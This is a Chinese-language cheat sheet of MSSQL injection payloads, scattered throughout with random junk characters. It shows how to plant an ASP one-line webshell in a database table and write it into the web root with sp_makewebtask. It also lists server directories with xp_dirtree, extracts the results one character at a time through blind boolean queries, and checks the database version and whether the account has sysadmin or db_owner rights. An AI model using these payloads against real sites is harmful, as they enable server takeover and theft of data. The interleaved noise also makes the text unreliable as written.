/ S. n& ~3 E8 V;insert into pcguest(pc) values ('%3c%25execute request(%22p%22)%25%3e');-- 6 k$ @: @( w( ]1 i//将一句话木马插入表中 7 v. x5 ^3 s2 H6 A/ \# q* ~2 {: |) ~7 i e$ Q* L- H7 z! P
;execute sp_makewebtask @outputfile='E:\Inetpub\wwwroot\PC.ASP',@query='select pc from pcguest';-- ! B8 F. e# a! T
//导出一个ASP文件 7 ?/ W. p# U" ]2 e+ q * G( @9 F% u2 k* W0 J* J8 r( } : q6 c; b' J- ?3 J* k2 f- O关于MSSQL列目录3 _0 e4 R' E* M4 v. ?, J* o
;CREATE TABLE pctest(subdirectory VARCHAR(100),depth VARCHAR(100),[file] VARCHAR(100)) //建一个新表 $ J2 }% r: Y. VInsert pctest exec master..xp_dirtree "d:\app\",1,1 //用xp_dirtree列目录结果导入所建成的表 * W5 |+ d" F. Y8 m5 J, P1 W& _ l9 ]) g) |# w" x r: d
and (select Count(1) from [pctest]) between 0 and 99 //判断表中字段数来知道有几个文夹和目录: p, {+ R9 c$ W, i
: i2 }% t' d0 J, x$ [And (Select Top 1 len(Cast([file] as varchar(8000))+subdirectory) From (Select Top 2 [subdirectory],[file] From pctest ORDER BY [file],[subdirectory]) D ORDER BY [file] desc , [subdirectory] desc) between 0 and 20 //猜解第二个字段 ! c; [/ k/ P& V, e + l2 v( a- y8 jAnd (Select Top 1 unicode(substring(Cast([file] as varchar(8000))+subdirectory,1,1)) From (Select Top 1 [subdirectory],[file] From pctest ORDER BY [file],[subdirectory]) D ORDER BY [file] desc , [subdirectory] desc) between 30 and 130 //逐一猜解字段名的每位字符3 P& V) n7 V& a1 m7 P1 t
! \6 k+ `- `# _$ g+ w1 x# U
: r$ M/ z0 g1 f0 V2 e
数据库版本和权限查看 + l e/ D4 \) C S) P7 T& vand 1=(select @@VERSION) //查看详细的数据库信息.0 T5 a7 k- e! g# Z8 ?& \: y
and 1=(SELECT IS_SRVROLEMEMBER('sysadmin'));-- //查看权限是不是SA. W6 u3 c9 f* v* A4 {5 O8 l( h+ L
and 1=(SELECT IS_MEMBER('db_owner'));-- //查看权限是不是DB_ONWER8 |, d" y: `" C( ~$ g
/ Y; ~4 \+ q4 O, l- z& h0 `